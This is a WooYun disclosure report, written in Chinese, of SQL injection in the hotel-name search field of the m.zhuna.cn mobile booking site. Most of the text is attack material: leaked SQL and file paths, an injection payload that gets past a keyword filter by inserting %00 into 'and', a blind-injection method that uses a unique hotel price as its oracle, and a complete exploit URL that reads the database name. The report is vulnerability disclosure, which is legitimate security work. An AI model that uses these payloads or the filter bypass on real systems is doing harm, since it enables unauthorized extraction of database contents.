WooYun.org

站点：http://m.zhuna.cn
在酒店预定的酒店名称处存在注入

得到如下信息：
Filename: /var/wwwroot/testwap/wap/models/index_model.php
select * from (select ID,HotelName,cityname,eareaname,address,XingJi,Min_Jiage,Max_Jiage,df_haoping,x,y,CBD,dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng) as juli, px_dingdan ,dbo.compare(1,1,day10) as day10_isfull ,ROW_NUMBER() OVER ( ORDER BY dbo.compare(1,1,day10) desc, dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng), px_dingdan DESC, id DESC ) as rowslist from hotelinfo where ecityid = 0101 and shenhe = 1 AND (lat between 39.948688179804 and 40.048688179804) and (lng between 116.29375398973 and 116.39375398973 ) AND Min_Jiage >= 0 and hotelname like '%'%' and x is not null and y is not null ) as a where a.rowslist > 0 and a.rowslist <= 10
接下来就是构造注入语句：
构造注入语句如下：
%' and 1=1 and '%'='
提示存在危险字符：

修改注入语句绕过：
%' an%00d 1=1 an%00d '%'='
接下来发现1=1,1=2,‘A’='A'等都不能作为判定条件<查询返回相同，都是查不到结果，很奇怪>，然后尝试构造时间延迟，报错注入等，要么提示语法错误，要么提示不是built-in function，

现在的问题是找到一个判断条件，来对输出的结果进行判定，这个判断条件来自哪里呢？
这时候看到有一个酒店价格，选中搜索一下，

SQL语句中多了一句：
AND Min_Jiage <= 150
价格大于150的，是数字，那么可以找到一个价格，返回唯一的值，即可作为判断条件，这里将酒店价格选择不限，然后在注入语句中插入该查询条件，
找到一个合适的价格，只返回唯一的值
AND Min_Jiage = 600

继续构造：
%' an%00d Min_Jiage = (ascii(substring(db_name(),1,1))+496) an%00d '%'='
http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=bj&tm1=2015-04-12&day=1&position=%E4%BA%94%E9%81%93%E5%8F%A3&keyword=%25%27+an%2500d+Min_Jiage+%3D+%28ascii%28substring%28db_name%28%29%2C1%2C1%29%29%2B496%29+an%2500d+%27%25%27%3D%27&price=